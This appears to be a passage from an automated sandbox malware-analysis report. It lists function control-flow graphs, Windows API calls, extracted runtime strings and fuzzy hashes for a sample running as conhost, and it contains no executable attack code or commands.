                                                        • Associated: 00000023.00000002.3366732968.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_35_2_140000000_conhost.jbxd
                                                        Similarity
                                                        • API ID: Worker$FactoryRelease
                                                        • String ID:
                                                        • API String ID: 4113960433-0
                                                        • Opcode ID: 1e727cabbff0cae9e27b261b2207436e6fa371e00c3f64abe26120617a749e69
                                                        • Instruction ID: 0a01b27cd887de470f3a79e9e26df08ee21fc81555de9c41fe10c45f52e6a1ec
                                                        • Opcode Fuzzy Hash: 1e727cabbff0cae9e27b261b2207436e6fa371e00c3f64abe26120617a749e69
                                                        • Instruction Fuzzy Hash: CAF0AFB2608B408AEA12DF52F89579A77A0F38D7C0F00991ABBC843735DB3CC190CB40

                                                        Non-executed Functions

                                                        Function 00000001400026E0 Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 376COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 311 1400026e0-14000273b call 140002660 315 140002741-14000274b 311->315 316 14000280e-14000285e call 14000155d 311->316 318 140002774-14000277a 315->318 321 140002953-14000297b call 1400014c7 316->321 322 140002864-140002873 316->322 318->316 320 140002780-140002787 318->320 323 140002789-140002792 320->323 324 140002750-140002752 320->324 339 140002986-1400029c8 call 140001503 call 140005a50 321->339 340 14000297d 321->340 325 140002eb7-140002ef4 call 140001370 322->325 326 140002879-140002888 322->326 329 140002794-1400027ab 323->329 330 1400027f8-1400027fb 323->330 327 14000275a-14000276e 324->327 331 1400028e4-14000294e wcsncmp call 1400014e5 326->331 332 14000288a-1400028dd 326->332 327->316 327->318 335 1400027f5 329->335 336 1400027ad-1400027c2 329->336 330->327 331->321 332->331 335->330 341 1400027d0-1400027d7 336->341 349 140002e49-140002e84 call 140001370 339->349 350 1400029ce-1400029d5 339->350 340->339 342 1400027d9-1400027f3 341->342 343 140002800-140002809 341->343 342->335 342->341 343->327 353 1400029d7-140002a0c 349->353 357 140002e8a 349->357 352 140002a13-140002a43 wcscpy wcscat wcslen 350->352 350->353 355 140002a45-140002a76 wcslen 352->355 356 140002a78-140002aa5 352->356 353->352 358 140002aa8-140002abf wcslen 355->358 356->358 357->352 359 140002ac5-140002ad8 358->359 360 140002e8f-140002eab call 140001370 358->360 362 140002af5-140002dfb wcslen call 1400014a9 * 2 call 1400014f4 call 1400014c7 * 2 call 14000145e * 3 359->362 363 140002ada-140002aee 359->363 360->325 381 140002dfd-140002e1b call 140001512 362->381 382 140002e20-140002e48 call 14000145e 362->382 363->362 381->382
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000023.00000002.3365332941.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000023.00000002.3365239770.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000023.00000002.3366595443.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000023.00000002.3366690377.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000023.00000002.3366732968.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_35_2_140000000_conhost.jbxd
                                                        Similarity
                                                        • API ID: wcslen$wcscatwcscpywcsncmp
                                                        • String ID: 0$X$\BaseNamedObjects\ebrlswnkdyyxlbjuhpveplar$`
                                                        • API String ID: 597572034-3053274307
                                                        • Opcode ID: 8a08bf91d6c25843e63d5b2ff1be0b4d4663f99253e455713b2a47471607218e
                                                        • Instruction ID: 54cc81b0cc6ec1b059e349223bab6f0a862094673fb8261370da5aef119cf5ad
                                                        • Opcode Fuzzy Hash: 8a08bf91d6c25843e63d5b2ff1be0b4d4663f99253e455713b2a47471607218e
                                                        • Instruction Fuzzy Hash: 801248B2608BC085E762CB16F8443EA77A4F789794F414215EBA857BF5EF78C189C700
                                                        Function 0000000140001160 Relevance: 13.6, APIs: 9, Instructions: 130sleepstringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000023.00000002.3365332941.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000023.00000002.3365239770.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000023.00000002.3366595443.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000023.00000002.3366690377.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000023.00000002.3366732968.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_35_2_140000000_conhost.jbxd
                                                        Similarity
                                                        • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                        • String ID:
                                                        • API String ID: 2643109117-0
                                                        • Opcode ID: c4d67565a20342ade335354fc59ecc84fd5eb261badca5579fbb5ee24efd579b
                                                        • Instruction ID: 070ab519a2817fabac9d3928640a8dfc31f1868cd1d81c957eb574597805d415
                                                        • Opcode Fuzzy Hash: c4d67565a20342ade335354fc59ecc84fd5eb261badca5579fbb5ee24efd579b
                                                        • Instruction Fuzzy Hash: E05113B1A11A4085FB16EF27F9947EA27A5BB8D7D0F849121FB4D873B6DE38C4958300
                                                        Function 0000000140001BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 427 140001ba0-140001bc0 428 140001bc2-140001bd7 427->428 429 140001c09 427->429 430 140001be9-140001bf1 428->430 431 140001c0c-140001c17 call 1400023b0 429->431 433 140001bf3-140001c02 430->433 434 140001be0-140001be7 430->434 437 140001cf4-140001cfe call 140001d40 431->437 438 140001c1d-140001c6c call 1400024d0 VirtualQuery 431->438 433->434 436 140001c04 433->436 434->430 434->431 439 140001cd7-140001cf3 memcpy 436->439 442 140001d03-140001d1e call 140001d40 437->442 438->442 445 140001c72-140001c79 438->445 446 140001d23-140001d38 GetLastError call 140001d40 442->446 447 140001c7b-140001c7e 445->447 448 140001c8e-140001c97 445->448 450 140001cd1 447->450 451 140001c80-140001c83 447->451 452 140001ca4-140001ccf VirtualProtect 448->452 453 140001c99-140001c9c 448->453 450->439 451->450 455 140001c85-140001c8a 451->455 452->446 452->450 453->450 456 140001c9e 453->456 455->450 457 140001c8c 455->457 456->452 457->456
                                                        APIs
                                                        • VirtualQuery.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                                        • VirtualProtect.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                        • memcpy.MSVCRT ref: 0000000140001CE0
                                                        • GetLastError.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000023.00000002.3365332941.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000023.00000002.3365239770.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000023.00000002.3366595443.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000023.00000002.3366690377.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000023.00000002.3366732968.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_35_2_140000000_conhost.jbxd
                                                        Similarity
                                                        • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                        • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                        • API String ID: 2595394609-2123141913
                                                        • Opcode ID: 79a2a9d4ac031f2ce5fafed73baa3885646a95f71b85d3d4911c59ac99310c7d
                                                        • Instruction ID: 568161692b5c4f8a705951d6b28697fc04e6310cca5c6e1950853b3621b7b2e0
                                                        • Opcode Fuzzy Hash: 79a2a9d4ac031f2ce5fafed73baa3885646a95f71b85d3d4911c59ac99310c7d
                                                        • Instruction Fuzzy Hash: 334143F1601A4586FA26DF47F884BE927A0E78DBC4F554126EF0E877B1DA38C586C700
                                                        Function 0000000140002104 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 458 140002104-14000210b 459 140002111-140002128 EnterCriticalSection 458->459 460 140002218-140002221 458->460 461 14000220b-140002212 LeaveCriticalSection 459->461 462 14000212e-14000213c 459->462 463 140002272-140002280 460->463 464 140002223-14000222d 460->464 461->460 465 14000214d-140002159 TlsGetValue GetLastError 462->465 466 140002241-140002263 DeleteCriticalSection 464->466 467 14000222f 464->467 468 14000215b-14000215e 465->468 469 140002140-140002147 465->469 466->463 470 140002230-14000223f 467->470 468->469 471 140002160-14000216d 468->471 469->461 469->465 470->466 471->469
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000023.00000002.3365332941.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000023.00000002.3365239770.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000023.00000002.3366595443.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000023.00000002.3366690377.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000023.00000002.3366732968.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_35_2_140000000_conhost.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$DeleteEnterErrorLastLeaveValue
                                                        • String ID:
                                                        • API String ID: 926137887-0
                                                        • Opcode ID: 90a19a65f5c6fc128aa79077d7c42a4fb441e5ead76d492d121654b50c4905b0
                                                        • Instruction ID: f187cb6aa2ea60f0469956b9f5200469d8ecfadf0b7e99ee31c93393cd0a6912
                                                        • Opcode Fuzzy Hash: 90a19a65f5c6fc128aa79077d7c42a4fb441e5ead76d492d121654b50c4905b0
                                                        • Instruction Fuzzy Hash: 1521E0B1715A1292FA5BEB53F9483E923A0B76CBD0F444021FB1E576B4DB7A8986C300
                                                        Function 0000000140001880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 474 140001880-14000189c 475 1400018a2-1400018f9 call 140002420 call 140002660 474->475 476 140001a0f-140001a1f 474->476 475->476 481 1400018ff-140001910 475->481 482 140001912-14000191c 481->482 483 14000193e-140001941 481->483 484 14000194d-140001954 482->484 485 14000191e-140001929 482->485 483->484 486 140001943-140001947 483->486 489 140001956-140001961 484->489 490 14000199e-1400019a6 484->490 485->484 487 14000192b-14000193a 485->487 486->484 488 140001a20-140001a26 486->488 487->483 491 140001b87-140001b98 call 140001d40 488->491 492 140001a2c-140001a37 488->492 493 140001970-14000199c call 140001ba0 489->493 490->476 494 1400019a8-1400019c1 490->494 492->490 495 140001a3d-140001a5f 492->495 493->490 498 1400019df-1400019e7 494->498 501 140001a7d-140001a97 495->501 499 1400019e9-140001a0d VirtualProtect 498->499 500 1400019d0-1400019dd 498->500 499->500 500->476 500->498 504 140001b74-140001b82 call 140001d40 501->504 505 140001a9d-140001afa 501->505 504->491 511 140001b22-140001b26 505->511 512 140001afc-140001b0e 505->512 515 140001b2c-140001b30 511->515 516 140001a70-140001a77 511->516 513 140001b5c-140001b6c 512->513 514 140001b10-140001b20 512->514 513->504 518 140001b6f call 140001d40 513->518 514->511 514->513 515->516 517 140001b36-140001b57 call 140001ba0 515->517 516->490 516->501 517->513 518->504
                                                        APIs
                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000023.00000002.3365332941.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000023.00000002.3365239770.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000023.00000002.3366595443.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000023.00000002.3366690377.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000023.00000002.3366732968.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_35_2_140000000_conhost.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                        • API String ID: 544645111-395989641
                                                        • Opcode ID: a6faf70e8b190511a78e30de1eab31b3fdd89b936d163022cdfacdbb5805c305
                                                        • Instruction ID: bed1886f8e7b3562c786f91e2c2504e2a336d35a61311b426e06807153cec951
                                                        • Opcode Fuzzy Hash: a6faf70e8b190511a78e30de1eab31b3fdd89b936d163022cdfacdbb5805c305
                                                        • Instruction Fuzzy Hash: 415114B6B11544DAEB12CF67F840BE827A1A759BE8F548212FB1D077B4DB38C986C700
                                                        Function 0000000140001800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 522 140001800-140001810 523 140001812-140001822 522->523 524 140001824 522->524 525 14000182b-140001867 call 140002290 fprintf 523->525 524->525
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000023.00000002.3365332941.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000023.00000002.3365239770.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000023.00000002.3366595443.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000023.00000002.3366690377.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000023.00000002.3366732968.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_35_2_140000000_conhost.jbxd
                                                        Similarity
                                                        • API ID: fprintf
                                                        • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                        • API String ID: 383729395-3474627141
                                                        • Opcode ID: 6b47e17b8a12b31c17ff5f2ad6e06330f120307e4e61a4ac2284c96fa72ab60d
                                                        • Instruction ID: 91e3a911f83b651f4698e80430053fdc384feaeeeedb9bbeb5e2969e9f62671f
                                                        • Opcode Fuzzy Hash: 6b47e17b8a12b31c17ff5f2ad6e06330f120307e4e61a4ac2284c96fa72ab60d
                                                        • Instruction Fuzzy Hash: BDF0C271A04A4482E212EB2AB9413EAA360E74D3C1F409211FF4D532A1DF3CD1828300
                                                        Function 000000014000219E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 528 14000219e-1400021a5 529 140002272-140002280 528->529 530 1400021ab-1400021c2 EnterCriticalSection 528->530 531 140002265-14000226c LeaveCriticalSection 530->531 532 1400021c8-1400021d6 530->532 531->529 533 1400021e9-1400021f5 TlsGetValue GetLastError 532->533 534 1400021f7-1400021fa 533->534 535 1400021e0-1400021e7 533->535 534->535 536 1400021fc-140002209 534->536 535->531 535->533 536->535
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000023.00000002.3365332941.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000023.00000002.3365239770.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000023.00000002.3366595443.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000023.00000002.3366690377.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000023.00000002.3366732968.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_35_2_140000000_conhost.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                        • String ID:
                                                        • API String ID: 682475483-0
                                                        • Opcode ID: ef714723185b3a8d2aed80037f9450dbdc245cd35eb766ee46406a0163f8cc51
                                                        • Instruction ID: 8e08899b71d5d6c295770fc95a4fa8b22c720a8a39741bac27afb53efd3d8dea
                                                        • Opcode Fuzzy Hash: ef714723185b3a8d2aed80037f9450dbdc245cd35eb766ee46406a0163f8cc51
                                                        • Instruction Fuzzy Hash: C201B2B5705A0192FA5BDB53FE083E86360B76CBD1F454061EF0957AB4DF79C996C200